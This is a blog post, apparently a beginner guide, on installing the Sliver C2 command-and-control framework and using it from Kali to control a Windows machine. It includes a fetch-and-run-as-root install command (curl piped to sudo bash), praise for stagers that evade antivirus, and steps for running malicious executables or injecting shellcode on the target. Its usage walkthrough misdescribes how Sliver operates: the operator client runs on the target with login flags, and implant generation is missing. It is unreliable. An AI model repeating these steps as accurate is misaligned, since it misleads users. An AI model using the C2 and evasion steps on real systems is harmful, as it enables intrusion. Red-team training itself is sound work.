Powering Up Your Red Team: Installing and Mastering the Sliver C2 Framework

Sliver C2 is an open source command and control (C2) framework used for red teaming and penetration testing. It offers a range of features and is actively maintained, making it a popular choice among security professionals. However, for beginners, setting up and using Sliver C2 can seem daunting. This blog post series aims to provide a step-by-step guide for beginners on how to install and use Sliver C2. The series covers everything from basic installation to detailed explanations of different protocols and commands. By the end of the series, readers will have a solid understanding of how to use Sliver C2 to conduct effective red teaming engagements.


Understanding the Background Concepts of Sliver C2

Sliver C2 works by establishing a connection between a server and multiple client applications. The server acts as a central hub for communication and control, while the clients, also known as “operators” or “players,” execute commands and interact with the target system.

When an operator runs the Sliver client on a target system, it establishes a secure connection to the Sliver server, which allows the operator to remotely control the target system. The operator can then execute commands, upload and download files, and interact with the system’s network.

Sliver C2 offers a range of communication protocols, including HTTP(S), DNS, mTLS, and WireGuard, which allows it to bypass firewalls and other security measures. It also provides various stagers, which are used to evade detection by antivirus software and other security tools.

Overall, Sliver C2 provides a powerful platform for red teaming and penetration testing by enabling remote control of target systems, while also offering features for evading detection and maintaining persistence.


Installation Steps for Sliver:

Download in one simple easy command:

curl https://sliver.sh/install|sudo bash

OR if you feel unsafe to use online script install step by step process:

  1. Install MinGW: Sliver requires MinGW to cross-compile executables or DLLs. To install it, run the following command: apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
  2. Download Client and Server Binaries: Sliver uses a client-server architecture to allow multiple operators to work together. The binaries can be found on GitHub. You can use the following command to get the download links for the latest version: curl -s https://api.github.com/repos/BishopFox/sliver/releases/latest | jq -r '.assets | .[] | .browser_download_url' | grep -E '(sliver-server_linux|sliver-client_linux)$'
  3. Download and Set Permissions: Use the wget command to download the binaries and set appropriate permissions. For example:
wget -O /usr/local/bin/sliver-server https://github.com/BishopFox/sliver/releases/download/v1.5.36/sliver-server_linux && chmod 755 /usr/local/bin/sliver-server

wget -O /usr/local/bin/sliver https://github.com/BishopFox/sliver/releases/download/v1.5.36/sliver-client_linux && chmod 755 /usr/local/bin/sliver

Using Sliver for Red Teaming: Example with Windows and Kali

  1. Install Sliver on Kali Linux machine:
    • Follow the installation steps to install the Sliver server and client on Kali Linux.
    • Once installed, start the Sliver server by running the command `sliver-server` in the terminal.
  2. Set up a Windows target:
    • Set up a Windows virtual machine or a physical machine on which you want to perform the red team operation.
    • Download the Sliver client binary for Windows from the GitHub release page and transfer it to the target machine.
  3. Run the Sliver client on the Windows target:
    • Open a command prompt as an administrator on the target machine and navigate to the directory where you have saved the Sliver client binary.
    • Run the command `sliver.exe -server <IP address of Kali Linux machine> -username <operator username> -password <operator password>` to start the Sliver client and connect it to the Sliver server running on the Kali Linux machine.
    • Once connected, the Sliver client will start listening for commands from the operator.
  4. Control the Windows target from Kali Linux machine:
    • On the Kali Linux machine, start the Sliver client by running the command sliver -server <IP address of Kali Linux machine> -username <operator username> -password <operator password> in the terminal.
    • Once connected to the Sliver server, use the list command to see all the available clients (in this case, the Windows target machine).
    • Use the use command to select the target client and start sending commands to it. For example, you could use the run-exe command to execute a malicious executable on the Windows target or use the inject-shellcode command to inject a custom shellcode payload.

For more details use following sites:

https://github.com/BishopFox/sliver

https://dominicbreuker.com/post/learning_sliver_c2_01_installation/

Add a Comment

Your email address will not be published. Required fields are marked *